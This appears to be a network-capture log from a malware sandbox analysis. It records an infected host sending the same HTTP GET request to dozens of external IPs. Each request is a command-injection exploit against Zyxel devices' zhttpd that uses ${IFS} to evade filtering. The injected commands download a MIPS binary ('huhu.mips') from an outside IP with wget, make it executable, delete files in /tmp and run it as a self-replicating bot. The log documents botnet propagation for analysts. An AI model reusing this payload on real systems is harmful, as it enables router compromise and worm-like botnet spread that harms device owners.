                                      Jan 19, 2024 17:29:46.047647953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7658192.168.2.1456742146.60.158.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047699928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7659192.168.2.144556876.221.54.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047728062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7660192.168.2.1459534143.102.109.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047751904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7661192.168.2.143428448.192.94.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047785044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7662192.168.2.145389831.95.83.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047832966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7663192.168.2.1443778128.5.231.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047879934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7664192.168.2.1438628157.119.240.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047909975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7665192.168.2.1447572167.67.220.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047944069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7666192.168.2.1455194144.28.134.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.047977924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7667192.168.2.1438344156.70.113.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048042059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7668192.168.2.1437844191.169.38.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048090935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7669192.168.2.143990262.80.74.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048129082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7670192.168.2.1455084135.82.48.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048190117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7671192.168.2.1460432191.45.90.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048230886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7672192.168.2.145421620.51.179.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048260927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7673192.168.2.143719825.83.39.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048314095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7674192.168.2.144159273.79.27.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048362970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7675192.168.2.1452552169.185.192.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048414946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7676192.168.2.143832824.179.23.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048449039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7677192.168.2.1447884119.229.168.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048489094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7678192.168.2.1439728168.109.217.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048590899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7679192.168.2.143466285.233.244.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048616886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7680192.168.2.146026070.127.125.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048616886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7681192.168.2.1454846172.116.44.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048621893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7682192.168.2.1457754175.123.231.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048672915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7683192.168.2.1443446196.171.43.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048690081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7684192.168.2.144843470.227.242.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048753977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7685192.168.2.1432902102.205.245.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048813105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7686192.168.2.1451128202.175.18.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048835039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7687192.168.2.144869857.217.163.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048871040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7688192.168.2.1445354146.90.31.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048924923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7689192.168.2.1436632193.73.53.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.048998117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7690192.168.2.1439834221.222.31.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049026012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7691192.168.2.1443596216.49.167.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049051046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7692192.168.2.1453598111.125.150.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049082041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7693192.168.2.14577449.32.170.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049104929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7694192.168.2.144646035.212.252.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049165964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7695192.168.2.1439678186.91.211.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049201012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7696192.168.2.1458012120.198.202.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049249887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7697192.168.2.1451816104.96.34.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049304008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7698192.168.2.1440034128.113.29.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049326897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7699192.168.2.1453426205.179.197.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049370050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7700192.168.2.143914691.136.123.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049424887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7701192.168.2.144468479.130.67.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049472094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7702192.168.2.144352423.216.196.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049504042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7703192.168.2.1434334130.198.129.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049541950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7704192.168.2.146084248.143.31.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049582005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7705192.168.2.1445884101.61.154.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049606085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7706192.168.2.1439950185.137.15.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049649000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7707192.168.2.1449872142.98.202.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049695969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7708192.168.2.145731235.92.220.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049732924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7709192.168.2.146070095.100.217.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049750090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7710192.168.2.1457770150.178.30.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049801111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7711192.168.2.1456054160.67.117.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049851894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7712192.168.2.1439742114.9.125.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049880028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7713192.168.2.1442138102.238.105.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049916029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7714192.168.2.1448478203.187.100.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049935102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7715192.168.2.1443104212.244.154.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.049984932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7716192.168.2.1435642207.126.251.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050024033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7717192.168.2.1439392164.39.157.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050059080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7718192.168.2.145474095.249.111.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050088882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7719192.168.2.145763491.234.232.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050131083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7720192.168.2.1441872163.227.32.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050179958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7721192.168.2.1451082131.62.209.191443
                                      TimestampBytes transferredDirectionData
